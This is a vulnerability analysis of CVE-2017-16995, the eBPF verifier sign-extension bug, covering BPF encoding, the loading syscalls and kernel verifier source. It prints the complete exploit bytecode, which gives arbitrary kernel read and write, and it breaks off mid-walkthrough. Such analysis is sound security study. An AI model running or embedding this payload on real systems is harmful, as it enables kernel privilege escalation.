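CVE-2017-16995 is a vulnerability in the eBPF mechanism. During the verifier's simulated execution of a program, an incorrect sign extension makes the kernel misjudge the control flow. As a result, real execution later does things the verifier never anticipated.

I happened to be reading kernel code recently. In the spirit of learning while analyzing, let's take a detailed look at how CVE-2017-16995 works.

This article draws on several write-ups found online. Many thanks to their authors.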

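## What is BPF

Linux isolates user space from kernel space. Normally, getting the kernel to run your own code means writing a kernel module, and only root can load kernel modules. BPF (Berkeley Packet Filter) is more like a fast lane that the kernel opens for users: it provides a bridge for passing code and data between user space and the kernel.

- **Code:** a user hands code to the kernel as eBPF bytecode. The kernel runs that code when an event occurs, for example when data is written to a socket.
- **Data:** user space and the kernel share data through maps (key/value stores). User space writes to a map and the kernel reads from it, and vice versa.

BPF was originally designed for low-level network filtering. Two properties made it popular far beyond that: it makes it easy to inject code into the kernel, and it comes with a full set of safety checks that protect the kernel. It is now widely used for packet capture, kernel probes, performance monitoring and similar tasks.

BPF has gone through two stages, cBPF (classic BPF) and eBPF (extended BPF). cBPF has largely been superseded, and the kernel internally translates classic BPF programs into eBPF. In the rest of this article, BPF means eBPF.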

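## The BPF instruction set

BPF works like a virtual machine, with its own instruction format and syntax.

BPF has 11 registers. When BPF is JIT-compiled on x86-64, each of them maps to one physical register, as shown below. The x86-64 register r9 is not part of the mapping; it is the sixth argument register in the System V calling convention. Only R1 to R5 carry arguments, so a BPF function call takes at most five arguments.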

```
R0  - rax
R1  - rdi
R2  - rsi
R3  - rdx
R4  - rcx
R5  - r8
R6  - rbx
R7  - r13
R8  - r14
R9  - r15
R10 - rbp (frame pointer)
```

Every instruction has the following format:

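```c
struct bpf_insn {
    __u8  code;       /* opcode */
    __u8  dst_reg:4;  /* destination register */
    __u8  src_reg:4;  /* source register */
    __s16 off;        /* signed offset */
    __s32 imm;        /* signed immediate constant */
};
```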

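Take a 32-bit assembly move such as `mov eax, 0xffffffff`. Its BPF counterpart is `BPF_MOV32_IMM(DST, 0xFFFFFFFF)`. The payload analyzed below uses `BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)`, and its bytecode has dst_reg = 9. The `BPF_MOV32_IMM` macro is defined in include/linux/filter.h: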

```c
#define BPF_MOV32_IMM(DST, IMM)                 \
    ((struct bpf_insn) {                        \
        .code    = BPF_ALU | BPF_MOV | BPF_K,   \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off     = 0,                           \
        .imm     = IMM })
```

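Following the structure layout, this instruction encodes to the bytes `\xb4\x09\x00\x00\xff\xff\xff\xff`:

- code 0xb4 = BPF_ALU (0x04) | BPF_MOV (0xb0) | BPF_K (0x00);
- byte 1 is 0x09, packing dst_reg = 9 and src_reg = 0;
- off is 0x0000;
- imm is 0xffffffff, stored little-endian.

The relevant macros are in include/uapi/linux/bpf_common.h and include/uapi/linux/bpf.h.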
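The sketch below serializes an instruction by hand, to make the byte layout concrete. It makes three assumptions:

- the little-endian layout used on x86-64, with dst_reg in the low nibble of byte 1 and off/imm stored little-endian;
- opcode constants copied from the UAPI headers, so no kernel headers are needed;
- hypothetical helper names `encode_insn` and `encode_mov32_imm_r9`.

```c
#include <stdint.h>

/* Opcode bits copied from include/uapi/linux/bpf_common.h and bpf.h
 * so this sketch compiles without kernel headers. */
#define BPF_ALU 0x04
#define BPF_MOV 0xb0
#define BPF_K   0x00

/* Hypothetical helper: serialize one eBPF instruction into 8 bytes.
 * Assumed layout (little-endian, as on x86-64): code, then dst_reg in
 * the low nibble and src_reg in the high nibble of byte 1, then off
 * (16-bit LE) and imm (32-bit LE). */
static void encode_insn(uint8_t out[8], uint8_t code, uint8_t dst,
                        uint8_t src, int16_t off, int32_t imm)
{
    uint16_t uoff = (uint16_t)off;
    uint32_t uimm = (uint32_t)imm;

    out[0] = code;
    out[1] = (uint8_t)(((src & 0x0f) << 4) | (dst & 0x0f));
    out[2] = (uint8_t)(uoff & 0xff);
    out[3] = (uint8_t)(uoff >> 8);
    out[4] = (uint8_t)(uimm & 0xff);
    out[5] = (uint8_t)(uimm >> 8);
    out[6] = (uint8_t)(uimm >> 16);
    out[7] = (uint8_t)(uimm >> 24);
}

/* BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF): 0xFFFFFFFF is -1 as an s32. */
static void encode_mov32_imm_r9(uint8_t out[8])
{
    encode_insn(out, BPF_ALU | BPF_MOV | BPF_K, 9, 0, 0, -1);
}
```

Calling `encode_mov32_imm_r9(buf)` fills `buf` with the same eight bytes as the first instruction of the payload.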

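## The BPF loading process

A typical BPF workflow looks like this:

1. The user program calls `syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))` to create a map. The `attr` structure specifies the map type, the key and value sizes, the maximum number of entries and other attributes.
2. The user program calls `syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))` to load the BPF code into the kernel. Here `attr` holds the instruction count, a pointer to the first instruction, the log level and so on.
   - Before loading, the kernel simulates the program's execution to check that it is safe.
   - The checks cover instruction syntax, the number of instructions, and the ranges and read/write permissions of the pointers and immediates the instructions use.
   - Kernel addresses must not be leaked to user space, and the program must not read or write kernel memory outside its own BPF stack.
   - Once the checks pass, the program is loaded into the kernel. It is not checked again when it actually runs.
3. The user program calls `setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd))` to attach the BPF program to a socket. `progfd` is the file descriptor returned by the previous step.
4. The user program triggers real execution of the BPF program by operating on that socket, for example by writing data to it.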
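The four steps can be sketched in user space as follows. This is a minimal illustration, not the exploit's loader. It assumes:

- the kernel UAPI header `<linux/bpf.h>` is installed;
- an array map and a trivial `r0 = 0; exit` socket filter, both chosen only for illustration;
- an `AF_UNIX` datagram socket pair;
- hypothetical helper names throughout.

On kernels where unprivileged BPF is disabled, or in sandboxes that block `bpf(2)`, the calls return -1 with `errno` set.

```c
#define _GNU_SOURCE
#include <errno.h>        /* callers inspect errno on failure */
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50  /* assumption: asm-generic value, used only if libc lacks it */
#endif

/* glibc has no bpf() wrapper, so invoke the syscall directly. */
static int sys_bpf(int cmd, union bpf_attr *attr)
{
    return (int)syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/* Step 1: BPF_MAP_CREATE (illustrative: array map, 4-byte keys, 8-byte values). */
static int create_array_map(unsigned int max_entries)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type = BPF_MAP_TYPE_ARRAY;
    attr.key_size = sizeof(uint32_t);
    attr.value_size = sizeof(uint64_t);
    attr.max_entries = max_entries;
    return sys_bpf(BPF_MAP_CREATE, &attr);
}

/* Step 2: BPF_PROG_LOAD. The verifier runs inside this call; when a log
 * buffer is supplied, its messages are written there. */
static int load_socket_filter(const struct bpf_insn *insns, unsigned int cnt,
                              char *logbuf, unsigned int log_size)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insns = (uint64_t)(unsigned long)insns;
    attr.insn_cnt = cnt;
    attr.license = (uint64_t)(unsigned long)"GPL";
    if (logbuf != NULL && log_size > 0) {
        attr.log_buf = (uint64_t)(unsigned long)logbuf;
        attr.log_size = log_size;
        attr.log_level = 1;
    }
    return sys_bpf(BPF_PROG_LOAD, &attr);
}

/* Steps 3 and 4: attach to sockets[1], then write to sockets[0] so the
 * filter runs on the datagram delivered to sockets[1]. */
static int attach_and_trigger(int progfd)
{
    int sockets[2];
    int ret;

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
        return -1;
    ret = setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF,
                     &progfd, sizeof(progfd));
    if (ret == 0 && write(sockets[0], "x", 1) != 1)
        ret = -1;
    close(sockets[0]);
    close(sockets[1]);
    return ret;
}

/* A verifier-friendly program: r0 = 0; exit. */
static int load_trivial_filter(void)
{
    struct bpf_insn prog[2];

    memset(prog, 0, sizeof(prog));
    prog[0].code = BPF_ALU64 | BPF_MOV | BPF_K;  /* r0 = 0 */
    prog[0].dst_reg = BPF_REG_0;
    prog[1].code = BPF_JMP | BPF_EXIT;           /* return r0 */
    return load_socket_filter(prog, 2, NULL, 0);
}
```

Keeping each step in its own function mirrors the list above. The verifier runs entirely inside step 2, which is where the rest of this article focuses.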

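## Root cause

Most of the background above comes from material found online (heh). Now let's look at the root cause in detail. All code below is from the Linux 4.5 kernel.

First, here is the payload used by the exploit: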

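```c
char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"  /*  0: mov32 r9, 0xffffffff */
               "\x55\x09\x02\x00\xff\xff\xff\xff"  /*  1: if r9 != 0xffffffff goto 4 */
               "\xb7\x00\x00\x00\x00\x00\x00\x00"  /*  2: mov64 r0, 0 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /*  3: exit */
               "\x18\x19\x00\x00\x03\x00\x00\x00"  /*  4: ld_imm64 r9, map fd 3 (src_reg = BPF_PSEUDO_MAP_FD) */
               "\x00\x00\x00\x00\x00\x00\x00\x00"  /*  5: upper half of ld_imm64 */
               "\xbf\x91\x00\x00\x00\x00\x00\x00"  /*  6: r1 = r9 (map) */
               "\xbf\xa2\x00\x00\x00\x00\x00\x00"  /*  7: r2 = r10 (frame pointer) */
               "\x07\x02\x00\x00\xfc\xff\xff\xff"  /*  8: r2 += -4 */
               "\x62\x0a\xfc\xff\x00\x00\x00\x00"  /*  9: *(u32 *)(r10 - 4) = 0 (key) */
               "\x85\x00\x00\x00\x01\x00\x00\x00"  /* 10: call 1 (bpf_map_lookup_elem) */
               "\x55\x00\x01\x00\x00\x00\x00\x00"  /* 11: if r0 != 0 goto 13 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /* 12: exit */
               "\x79\x06\x00\x00\x00\x00\x00\x00"  /* 13: r6 = *(u64 *)(r0 + 0), value of key 0 */
               "\xbf\x91\x00\x00\x00\x00\x00\x00"  /* 14: r1 = r9 */
               "\xbf\xa2\x00\x00\x00\x00\x00\x00"  /* 15: r2 = r10 */
               "\x07\x02\x00\x00\xfc\xff\xff\xff"  /* 16: r2 += -4 */
               "\x62\x0a\xfc\xff\x01\x00\x00\x00"  /* 17: *(u32 *)(r10 - 4) = 1 */
               "\x85\x00\x00\x00\x01\x00\x00\x00"  /* 18: call 1 */
               "\x55\x00\x01\x00\x00\x00\x00\x00"  /* 19: if r0 != 0 goto 21 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /* 20: exit */
               "\x79\x07\x00\x00\x00\x00\x00\x00"  /* 21: r7 = *(u64 *)(r0 + 0), value of key 1 */
               "\xbf\x91\x00\x00\x00\x00\x00\x00"  /* 22: r1 = r9 */
               "\xbf\xa2\x00\x00\x00\x00\x00\x00"  /* 23: r2 = r10 */
               "\x07\x02\x00\x00\xfc\xff\xff\xff"  /* 24: r2 += -4 */
               "\x62\x0a\xfc\xff\x02\x00\x00\x00"  /* 25: *(u32 *)(r10 - 4) = 2 */
               "\x85\x00\x00\x00\x01\x00\x00\x00"  /* 26: call 1 */
               "\x55\x00\x01\x00\x00\x00\x00\x00"  /* 27: if r0 != 0 goto 29 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /* 28: exit */
               "\x79\x08\x00\x00\x00\x00\x00\x00"  /* 29: r8 = *(u64 *)(r0 + 0), value of key 2 */
               "\xbf\x02\x00\x00\x00\x00\x00\x00"  /* 30: r2 = r0 */
               "\xb7\x00\x00\x00\x00\x00\x00\x00"  /* 31: r0 = 0 */
               "\x55\x06\x03\x00\x00\x00\x00\x00"  /* 32: if r6 != 0 goto 36 */
               "\x79\x73\x00\x00\x00\x00\x00\x00"  /* 33: r3 = *(u64 *)(r7 + 0) */
               "\x7b\x32\x00\x00\x00\x00\x00\x00"  /* 34: *(u64 *)(r2 + 0) = r3 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /* 35: exit */
               "\x55\x06\x02\x00\x01\x00\x00\x00"  /* 36: if r6 != 1 goto 39 */
               "\x7b\xa2\x00\x00\x00\x00\x00\x00"  /* 37: *(u64 *)(r2 + 0) = r10 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"  /* 38: exit */
               "\x7b\x87\x00\x00\x00\x00\x00\x00"  /* 39: *(u64 *)(r7 + 0) = r8 */
               "\x95\x00\x00\x00\x00\x00\x00\x00"; /* 40: exit */
```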
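The walkthrough computes class, opcode and source bit for each instruction. The small decoder below reproduces that arithmetic. The masks mirror `BPF_CLASS`, `BPF_OP` and `BPF_SRC` from include/uapi/linux/bpf_common.h. `decode_insn` and `struct decoded_insn` are hypothetical names, and the little-endian x86-64 layout is assumed.

```c
#include <stdint.h>

/* Field masks as defined in include/uapi/linux/bpf_common.h. */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_OP(code)    ((code) & 0xf0)
#define BPF_SRC(code)   ((code) & 0x08)

/* Hypothetical container for the decoded fields of one instruction. */
struct decoded_insn {
    uint8_t cls;      /* BPF_CLASS(code) */
    uint8_t op;       /* BPF_OP(code) */
    uint8_t src_bit;  /* BPF_SRC(code): 0 = BPF_K (imm), 0x08 = BPF_X (reg) */
    uint8_t dst_reg;  /* low nibble of byte 1 */
    uint8_t src_reg;  /* high nibble of byte 1 */
    int16_t off;
    int32_t imm;
};

/* Decode an 8-byte instruction stored in little-endian order. The
 * unsigned-to-signed conversions rely on two's complement (as with GCC). */
static struct decoded_insn decode_insn(const unsigned char p[8])
{
    struct decoded_insn d;

    d.cls = BPF_CLASS(p[0]);
    d.op = BPF_OP(p[0]);
    d.src_bit = BPF_SRC(p[0]);
    d.dst_reg = p[1] & 0x0f;
    d.src_reg = p[1] >> 4;
    d.off = (int16_t)(uint16_t)(p[2] | (p[3] << 8));
    d.imm = (int32_t)((uint32_t)p[4] | ((uint32_t)p[5] << 8) |
                      ((uint32_t)p[6] << 16) | ((uint32_t)p[7] << 24));
    return d;
}

/* The first four instructions of the payload. */
static const unsigned char first_four[4][8] = {
    { 0xb4, 0x09, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff },
    { 0x55, 0x09, 0x02, 0x00, 0xff, 0xff, 0xff, 0xff },
    { 0xb7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 },
    { 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 },
};
```

For example, `decode_insn(first_four[1])` yields class 0x05 (`BPF_JMP`), opcode 0x50 (`BPF_JNE`), source bit 0 (`BPF_K`), off 2 and imm -1.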

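The first stop is kernel/bpf/verifier.c, which verifies the BPF instructions the user asks to load. In essence, it simulates their execution and looks for illegal operations, such as leaking kernel stack addresses or reading and writing memory directly. If it finds any illegal operation, the program is rejected.

The first four instructions of the payload contain everything needed to trigger the bug, so let's go through them one at a time.

The whole payload first goes through `do_check` in kernel/bpf/verifier.c: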

```c
static int do_check(struct verifier_env *env)
{
    struct verifier_state *state = &env->cur_state;
    struct bpf_insn *insns = env->prog->insnsi;
    struct reg_state *regs = state->regs;
    int insn_cnt = env->prog->len;
    int insn_idx, prev_insn_idx = 0;
    int insn_processed = 0;
    bool do_print_state = false;

    init_reg_state(regs);
    insn_idx = 0;
    for (;;) {
        struct bpf_insn *insn;
        u8 class;
        int err;

        if (insn_idx >= insn_cnt) {
            verbose("invalid insn idx %d insn_cnt %d\n",
                    insn_idx, insn_cnt);
            return -EFAULT;
        }

        insn = &insns[insn_idx];
        class = BPF_CLASS(insn->code);

        if (++insn_processed > 32768) {
            verbose("BPF program is too large. Proccessed %d insn\n",
                    insn_processed);
            return -E2BIG;
        }

        err = is_state_visited(env, insn_idx);
        if (err < 0)
            return err;
        if (err == 1) {
            if (log_level) {
                if (do_print_state)
                    verbose("\nfrom %d to %d: safe\n",
                            prev_insn_idx, insn_idx);
                else
                    verbose("%d: safe\n", insn_idx);
            }
            goto process_bpf_exit;
        }

        if (log_level && do_print_state) {
            verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx);
            print_verifier_state(env);
            do_print_state = false;
        }

        if (log_level) {
            verbose("%d: ", insn_idx);
            print_bpf_insn(insn);
        }

        if (class == BPF_ALU || class == BPF_ALU64) {
            err = check_alu_op(env, insn);
            if (err)
                return err;

        } else if (class == BPF_LDX) {
            enum bpf_reg_type src_reg_type;

            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;

            err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
            if (err)
                return err;

            src_reg_type = regs[insn->src_reg].type;

            err = check_mem_access(env, insn->src_reg, insn->off,
                                   BPF_SIZE(insn->code), BPF_READ,
                                   insn->dst_reg);
            if (err)
                return err;

            if (BPF_SIZE(insn->code) != BPF_W) {
                insn_idx++;
                continue;
            }

            if (insn->imm == 0) {
                insn->imm = src_reg_type;
            } else if (src_reg_type != insn->imm &&
                       (src_reg_type == PTR_TO_CTX ||
                        insn->imm == PTR_TO_CTX)) {
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }

        } else if (class == BPF_STX) {
            enum bpf_reg_type dst_reg_type;

            if (BPF_MODE(insn->code) == BPF_XADD) {
                err = check_xadd(env, insn);
                if (err)
                    return err;
                insn_idx++;
                continue;
            }

            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            dst_reg_type = regs[insn->dst_reg].type;

            err = check_mem_access(env, insn->dst_reg, insn->off,
                                   BPF_SIZE(insn->code), BPF_WRITE,
                                   insn->src_reg);
            if (err)
                return err;

            if (insn->imm == 0) {
                insn->imm = dst_reg_type;
            } else if (dst_reg_type != insn->imm &&
                       (dst_reg_type == PTR_TO_CTX ||
                        insn->imm == PTR_TO_CTX)) {
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }

        } else if (class == BPF_ST) {
            if (BPF_MODE(insn->code) != BPF_MEM ||
                insn->src_reg != BPF_REG_0) {
                verbose("BPF_ST uses reserved fields\n");
                return -EINVAL;
            }
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            err = check_mem_access(env, insn->dst_reg, insn->off,
                                   BPF_SIZE(insn->code), BPF_WRITE,
                                   -1);
            if (err)
                return err;

        } else if (class == BPF_JMP) {
            u8 opcode = BPF_OP(insn->code);

            if (opcode == BPF_CALL) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->off != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_CALL uses reserved fields\n");
                    return -EINVAL;
                }

                err = check_call(env, insn->imm);
                if (err)
                    return err;

            } else if (opcode == BPF_JA) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_JA uses reserved fields\n");
                    return -EINVAL;
                }

                insn_idx += insn->off + 1;
                continue;

            } else if (opcode == BPF_EXIT) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_EXIT uses reserved fields\n");
                    return -EINVAL;
                }

                err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
                if (err)
                    return err;

                if (is_pointer_value(env, BPF_REG_0)) {
                    verbose("R0 leaks addr as return value\n");
                    return -EACCES;
                }

process_bpf_exit:
                insn_idx = pop_stack(env, &prev_insn_idx);
                if (insn_idx < 0) {
                    break;
                } else {
                    do_print_state = true;
                    continue;
                }
            } else {
                /* conditional jumps: JEQ, JNE, JGT, ... */
                err = check_cond_jmp_op(env, insn, &insn_idx);
                if (err)
                    return err;
            }
        } else if (class == BPF_LD) {
            u8 mode = BPF_MODE(insn->code);

            if (mode == BPF_ABS || mode == BPF_IND) {
                err = check_ld_abs(env, insn);
                if (err)
                    return err;

            } else if (mode == BPF_IMM) {
                err = check_ld_imm(env, insn);
                if (err)
                    return err;

                insn_idx++;
            } else {
                verbose("invalid BPF_LD mode\n");
                return -EINVAL;
            }
        } else {
            verbose("unknown insn class %d\n", class);
            return -EINVAL;
        }

        insn_idx++;
    }

    return 0;
}
```

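Let's start with the first instruction, `\xb4\x09\x00\x00\xff\xff\xff\xff`.

Computing the class with the `BPF_CLASS` macro gives `0xb4 & 0x07 = 0x04`, i.e. `BPF_ALU`.

So execution enters the `if (class == BPF_ALU || class == BPF_ALU64)` branch and calls `check_alu_op`.

Here is check_alu_op: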

```c
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
    struct reg_state *regs = env->cur_state.regs;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode == BPF_END || opcode == BPF_NEG) {
        if (opcode == BPF_NEG) {
            if (BPF_SRC(insn->code) != 0 ||
                insn->src_reg != BPF_REG_0 ||
                insn->off != 0 || insn->imm != 0) {
                verbose("BPF_NEG uses reserved fields\n");
                return -EINVAL;
            }
        } else {
            if (insn->src_reg != BPF_REG_0 || insn->off != 0 ||
                (insn->imm != 16 && insn->imm != 32 && insn->imm != 64)) {
                verbose("BPF_END uses reserved fields\n");
                return -EINVAL;
            }
        }

        err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
        if (err)
            return err;

        if (is_pointer_value(env, insn->dst_reg)) {
            verbose("R%d pointer arithmetic prohibited\n",
                    insn->dst_reg);
            return -EACCES;
        }

        err = check_reg_arg(regs, insn->dst_reg, DST_OP);
        if (err)
            return err;

    } else if (opcode == BPF_MOV) {

        if (BPF_SRC(insn->code) == BPF_X) {
            if (insn->imm != 0 || insn->off != 0) {
                verbose("BPF_MOV uses reserved fields\n");
                return -EINVAL;
            }

            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
        } else {
            if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
                verbose("BPF_MOV uses reserved fields\n");
                return -EINVAL;
            }
        }

        err = check_reg_arg(regs, insn->dst_reg, DST_OP);
        if (err)
            return err;

        if (BPF_SRC(insn->code) == BPF_X) {
            if (BPF_CLASS(insn->code) == BPF_ALU64) {
                regs[insn->dst_reg] = regs[insn->src_reg];
            } else {
                if (is_pointer_value(env, insn->src_reg)) {
                    verbose("R%d partial copy of pointer\n",
                            insn->src_reg);
                    return -EACCES;
                }
                regs[insn->dst_reg].type = UNKNOWN_VALUE;
                regs[insn->dst_reg].map_ptr = NULL;
            }
        } else {
            /* R = imm: remember the constant (same code for ALU and ALU64) */
            regs[insn->dst_reg].type = CONST_IMM;
            regs[insn->dst_reg].imm = insn->imm;
        }

    } else if (opcode > BPF_END) {
        verbose("invalid BPF_ALU opcode %x\n", opcode);
        return -EINVAL;

    } else {
        bool stack_relative = false;

        if (BPF_SRC(insn->code) == BPF_X) {
            if (insn->imm != 0 || insn->off != 0) {
                verbose("BPF_ALU uses reserved fields\n");
                return -EINVAL;
            }
            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
        } else {
            if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
                verbose("BPF_ALU uses reserved fields\n");
                return -EINVAL;
            }
        }

        err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
        if (err)
            return err;

        if ((opcode == BPF_MOD || opcode == BPF_DIV) &&
            BPF_SRC(insn->code) == BPF_K && insn->imm == 0) {
            verbose("div by zero\n");
            return -EINVAL;
        }

        if ((opcode == BPF_LSH || opcode == BPF_RSH ||
             opcode == BPF_ARSH) && BPF_SRC(insn->code) == BPF_K) {
            int size = BPF_CLASS(insn->code) == BPF_ALU64 ? 64 : 32;

            if (insn->imm < 0 || insn->imm >= size) {
                verbose("invalid shift %d\n", insn->imm);
                return -EINVAL;
            }
        }

        if (opcode == BPF_ADD &&
            BPF_CLASS(insn->code) == BPF_ALU64 &&
            regs[insn->dst_reg].type == FRAME_PTR &&
            BPF_SRC(insn->code) == BPF_K) {
            stack_relative = true;
        } else if (is_pointer_value(env, insn->dst_reg)) {
            verbose("R%d pointer arithmetic prohibited\n",
                    insn->dst_reg);
            return -EACCES;
        } else if (BPF_SRC(insn->code) == BPF_X &&
                   is_pointer_value(env, insn->src_reg)) {
            verbose("R%d pointer arithmetic prohibited\n",
                    insn->src_reg);
            return -EACCES;
        }

        err = check_reg_arg(regs, insn->dst_reg, DST_OP);
        if (err)
            return err;

        if (stack_relative) {
            regs[insn->dst_reg].type = PTR_TO_STACK;
            regs[insn->dst_reg].imm = insn->imm;
        }
    }

    return 0;
}
```

The function first computes the opcode: `0xb4 & 0xf0 = 0xb0`.

This is the value of `BPF_MOV`, so we enter the `else if (opcode == BPF_MOV)` branch.

After a series of checks, the code we care about is this:

```c
} else {
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
}
```

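This stores the immediate into the simulated register, recording the result of this mov. The immediate is the 0xffffffff in `\xb4\x09\x00\x00\xff\xff\xff\xff`.

Before moving on, let's look at how `regs[insn->dst_reg].imm` and `insn->imm` are declared: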

```c
struct reg_state {
    enum bpf_reg_type type;
    union {
        int imm;
        struct bpf_map *map_ptr;
    };
};
/* ... */
struct bpf_insn {
    __u8  code;
    __u8  dst_reg:4;
    __u8  src_reg:4;
    __s16 off;
    __s32 imm;
};
```

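Both fields have the same type: a signed 32-bit integer (`int` and `__s32`). In the verifier, R9 is therefore recorded as the constant 0xffffffff, i.e. -1.

Nothing is wrong so far. check_alu_op returns, and do_check moves on to the next instruction.

Next is the second instruction, `\x55\x09\x02\x00\xff\xff\xff\xff`.

As before, first compute the class: `0x55 & 0x07 = 0x05`.

This is a `BPF_JMP` instruction, so we enter the `else if (class == BPF_JMP)` branch and compute the opcode: `0x55 & 0xf0 = 0x50`, i.e. `BPF_JNE`.

Since this opcode is not `BPF_CALL`, `BPF_JA` or `BPF_EXIT`, do_check calls `check_cond_jmp_op`.

Here is the function: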

```c
static int check_cond_jmp_op(struct verifier_env *env,
                             struct bpf_insn *insn, int *insn_idx)
{
    struct reg_state *regs = env->cur_state.regs;
    struct verifier_state *other_branch;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode > BPF_EXIT) {
        verbose("invalid BPF_JMP opcode %x\n", opcode);
        return -EINVAL;
    }

    if (BPF_SRC(insn->code) == BPF_X) {
        if (insn->imm != 0) {
            verbose("BPF_JMP uses reserved fields\n");
            return -EINVAL;
        }

        err = check_reg_arg(regs, insn->src_reg, SRC_OP);
        if (err)
            return err;

        if (is_pointer_value(env, insn->src_reg)) {
            verbose("R%d pointer comparison prohibited\n",
                    insn->src_reg);
            return -EACCES;
        }
    } else {
        if (insn->src_reg != BPF_REG_0) {
            verbose("BPF_JMP uses reserved fields\n");
            return -EINVAL;
        }
    }

    err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
    if (err)
        return err;

    /* is the outcome of "R == imm" already known at verification time? */
    if (BPF_SRC(insn->code) == BPF_K &&
        (opcode == BPF_JEQ || opcode == BPF_JNE) &&
        regs[insn->dst_reg].type == CONST_IMM &&
        regs[insn->dst_reg].imm == insn->imm) {
        if (opcode == BPF_JEQ) {
            /* always taken: follow the jump only */
            *insn_idx += insn->off;
            return 0;
        } else {
            /* never taken: fall through only */
            return 0;
        }
    }

    other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
    if (!other_branch)
        return -EFAULT;

    if (BPF_SRC(insn->code) == BPF_K &&
        insn->imm == 0 && (opcode == BPF_JEQ ||
                           opcode == BPF_JNE) &&
        regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
        if (opcode == BPF_JEQ) {
            regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
            other_branch->regs[insn->dst_reg].type = CONST_IMM;
            other_branch->regs[insn->dst_reg].imm = 0;
        } else {
            other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
            regs[insn->dst_reg].type = CONST_IMM;
            regs[insn->dst_reg].imm = 0;
        }
    } else if (is_pointer_value(env, insn->dst_reg)) {
        verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
        return -EACCES;
    } else if (BPF_SRC(insn->code) == BPF_K &&
               (opcode == BPF_JEQ || opcode == BPF_JNE)) {
        if (opcode == BPF_JEQ) {
            other_branch->regs[insn->dst_reg].type = CONST_IMM;
            other_branch->regs[insn->dst_reg].imm = insn->imm;
        } else {
            regs[insn->dst_reg].type = CONST_IMM;
            regs[insn->dst_reg].imm = insn->imm;
        }
    }
    if (log_level)
        print_verifier_state(env);
    return 0;
}
```

In check_cond_jmp_op, the fragment to focus on is this one:

```c
if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == CONST_IMM &&
    regs[insn->dst_reg].imm == insn->imm) {
    if (opcode == BPF_JEQ) {
        *insn_idx += insn->off;
        return 0;
    } else {
        return 0;
    }
}

other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
    return -EFAULT;
/* ... */
```

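This fragment checks whether the outcome of the jump is already decided at verification time.

- **Outcome known:** the verifier follows only that outcome. For `JEQ` it advances insn_idx by the jump offset, because the jump is always taken. For `JNE` it leaves insn_idx unchanged, because the jump is never taken.
- **Outcome unknown:** the other branch might execute. The verifier calls push_stack to save the jump target as a pending branch, to be verified later.

Let's check whether the second instruction meets each of these conditions:

- `BPF_SRC(insn->code) == BPF_K`: `0x55 & 0x08 = 0x00`, which equals `BPF_K`. Satisfied.
- `(opcode == BPF_JEQ || opcode == BPF_JNE)`: the opcode is `0x50`, i.e. `BPF_JNE`. Satisfied.
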